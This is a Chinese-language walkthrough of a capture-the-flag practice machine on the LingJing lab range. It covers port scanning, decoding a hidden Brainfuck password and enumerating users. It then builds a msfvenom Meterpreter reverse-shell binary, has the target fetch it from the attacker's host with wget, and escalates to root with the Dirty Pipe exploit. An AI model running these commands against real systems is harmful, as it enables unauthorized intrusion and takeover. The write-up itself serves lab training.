灵境平台项目地址nullhttps://github.com/414aaj/LingJing安装教程(Lingling)灵境靶场安装及使用教程(windows和linux)-CSDN博客文章浏览阅读2.3k次点赞28次收藏23次。(Lingling)灵境靶场安装教程(windows和linux)_灵境靶场https://blog.csdn.net/2301_78519654/article/details/153920708?spm1001.2014.3001.5502测试环境靶机描述见下方图片靶机ip: 192.168.242.230攻击机ip:192.168.188.146开始扫描ipnmap -Pn -O -sV 192.168.242.230发现801394451000020000端口80端口网页检查源代码发现!-- dont worry no one will get here, its safe to share with you my access. Its encrypted :) [-]...----..-----------.-----------...-.--------..------------.---------... --在网上找个brainfuck在运行输出看到.2uqPEfj3DPa-3判断这可能是个密码拿到10000,20000端口的web发现需要用户名尝试常用的用户名均无果使用enum4linux工具枚举用户名enum4linux 192.168.242.230要输入密码的时候输入.2uqPEfj3DPa-3得到用户名cyber使用用户名cyber密码.2uqPEfj3DPa-3去20000的web服务登陆左下角有个模拟终端可以直接执行命令但是权限不是root所以需要进行提权这里为了方便使用msfmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST攻击机ip LPORT反弹端口 -f elf -o shell.elf使用http服务传输shell.elfpython3 -m http.server 8888在网页的虚拟终端执行wget http://攻击机ip:端口/shell.elf chmod x shell.elf在攻击机开启监听msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.188.146 set LPORT 3333 run #在web网页的终端执行 ./shell.elf成功建立会话现在开始提权background use post/multi/recon/local_exploit_suggester set SESSION 1 run检测出来可利用的模块# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.10.0 2 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable. Kernel version 5.10.0 appears to be vulnerable 3 exploit/linux/local/glibc_tunables_priv_esc Yes The target appears to be vulnerable. The glibc version (2.31-13deb11u2) found on the target appears to be vulnerable 4 exploit/linux/local/netfilter_nft_set_elem_init_privesc Yes The target appears to be vulnerable. The kernel 5 appears to be vulnerable, but no offsets are available for this version 5 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable. Target appears to be vulnerable 6 exploit/linux/local/su_login Yes The target appears to be vulnerable. Target appears to be vulnerable 7 exploit/linux/persistence/bash_profile Yes The service is running, but could not be validated. Bash profile exists and is writable: /home/cyber/.bashrc 8 exploit/linux/persistence/init_systemd Yes The target appears to be vulnerable. /tmp/ is writable and system is systemd based 9 exploit/multi/persistence/cron Yes The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found使用第一个模块cve_2022_0847use exploit/linux/local/cve_2022_0847_dirtypipe set SESSION 1 set LHOST 192.168.188.146 set LPORT 7777 run成功提权至root两个flag分别在/home/cyber和/root3mp!r3{You_Manage_To_Break_To_My_Secure_Access} 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}总结这个机器网上说的是用普通用户目录下的tar去读取/var/backups/下的.old_pass.bak文件读取出来的值是Ts4YurgtRX(~h网上说可以用来登陆root用户但是我尝试之后发现没有于是使用msf扫描最后提权的有疑问的可以留言